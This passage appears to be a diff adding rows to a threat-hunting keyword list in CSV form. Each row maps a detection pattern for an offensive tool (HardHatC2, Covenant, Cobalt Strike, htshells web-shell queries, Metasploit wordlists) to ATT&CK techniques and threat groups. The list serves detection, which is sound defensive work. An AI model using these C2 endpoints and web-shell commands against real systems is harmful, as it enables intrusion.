+"*http*127.0.0.1:21802*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*127.0.0.1:3030*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
+"*http*127.0.0.1:5000*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*127.0.0.1:50050*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*http*127.0.0.1:5096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*127.0.0.1:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*http*127.0.0.1:7096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*127.0.0.1:8080/*.dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*127.0.0.1:8080/*.exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*127.0.0.1:8080/*.ps1*","offensive_tool_keyword","HardHatC2","A C# Command & Control 
framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*127.0.0.1:9631*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*localhost:21802*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*localhost:3030*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
+"*http*localhost:5000*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*localhost:50050*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*http*localhost:5096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 
- TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*localhost:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*http*localhost:7096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http*localhost:9631*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*http.title:*BIG-IP®*- Redirect*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","54","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z"
+"*HTTP/EXEGOL-01.*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
+"*http://*/.htaccess?c=cmd*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
+"*http://*/.htaccess?c=uname -a*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
+"*http://*/FortyNorth/GetIt*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z"
+"*http://*/FortyNorth/PostIt*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z"
+"*http://*Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z"
+"*http://10.10.13.37*","offensive_tool_keyword","Dinjector","Collection of shellcode 
injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,,
+"*http://127.0.0.1/CrossC2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*http://127.0.0.1/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*http://127.0.0.1:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*http://127.0.0.1:35000*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z"
+"*http://127.0.0.1:443/aaaaaaaaa*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*http://127.0.0.1:443/bbbbbbbbb*","offensive_tool_keyword","crossc2","generate CobaltStrike's 
cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*http://127.0.0.1:7444*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*http://127.0.0.1:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*http://127.0.0.1:8000/1.jpg*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","0","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" +"*http://127.0.0.1:8000/gate.html*","greyware_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*http://127.0.0.1:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*http://127.0.0.1:8081*","greyware_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" +"*http://127.0.0.1:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*http://192.168.1.179:8000/session*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z"
+"*http://LhOsT/FiLNaMe.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*http://localhost:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*http://localhost:30662*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","955","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z"
+"*http://localhost:58082/broadcast?id=*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z"
+"*http://localhost:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*http://localhost:7681*","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
+"*http://localhost:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*http://localhost:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*http://shell:7681/token*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*http://tarantula.by.ru/localroot/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*http://tarantula.by.ru/localroot/2.6.x/h00lyshit*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*http://vpsip:28888*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*http://wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*http_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a 
widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_default_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_malleable.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*http_ntlmrelay.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_owa_common.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_stager_client_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_append*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_server_header*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 